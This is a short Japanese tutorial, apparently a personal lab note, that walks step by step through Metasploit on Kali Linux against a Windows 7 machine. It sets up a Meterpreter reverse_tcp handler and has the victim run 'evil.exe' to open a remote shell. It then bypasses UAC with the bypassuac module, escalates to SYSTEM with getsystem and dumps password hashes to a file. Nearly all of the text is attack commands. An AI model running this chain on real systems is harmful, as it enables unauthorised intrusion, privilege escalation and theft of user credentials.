Windows7 パスワードハッシュ入手
KaliLinux を起動し
1 | msfconsole |
で
Metaploit を起動
msf コンソールが起動したら
1 | use exploit /multi/handler |
でハンドラーモジュールを使用
1 | set payload windows /meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
1 | show options |
で設定を確認
これで
1 | exploit |
でペイロードが実行され、待受状態になるので
windows7 で evil.exe を実行
これで Meterpreter セッションが確率される
この状態からパスワードハッシュを入手しようとしても
ユーザ権限が低いためエラーとなる
このため
1 | background |
というように
background コマンドを使い
Meterpreter セッションをバックグラウンドにして
msf プロンプトにする
接続中のMeterpreter セッションの確認には
1 | sessions -i |
で確認できる
このときに Id をみておくことで
1 | sessions -i セッションID |
とすれば
Meterpreter セッションに戻すことができる
今回なら
1 | sessions -i 1 |
とすれば
Meterpreter セッションに戻すことができる
次にUAC機能をバイパスするモジュールを使う
これは確率済みセッションを通して Exploit を送る
1 | use exploit /windows/local/bypassuac |
で使用するペイロードをセット
1 | show options |
でオプションで使用するセッションIDが必要なのがわかる
次に
1 | set SESSION 1 |
でセッションをセット
そして再度 reverse_tcp を設定
1 | set payload windows /meterpreter/reverse_tcp |
でペイロードをセット
1 | set LHOST 192.168.1.134 |
で KaliLInux のIPアドレスを設定
1 | show options |
で設定を確認
これで
1 | exploit |
でUAC機能をバイパスした状態で実行できる
これで
1 | getuid |
で現状のユーザIDを確認
次に権限昇格
1 | getsystem -t 1 |
これでユーザ権限を確認するとSYSTEM権限になっているのがわかる
1 | getuid |
あとはパスワードハッシュをダンプ
1 | run hashdump |
実行結果をテキストファイルへ保存
今回は hash.txt というファイルへ保存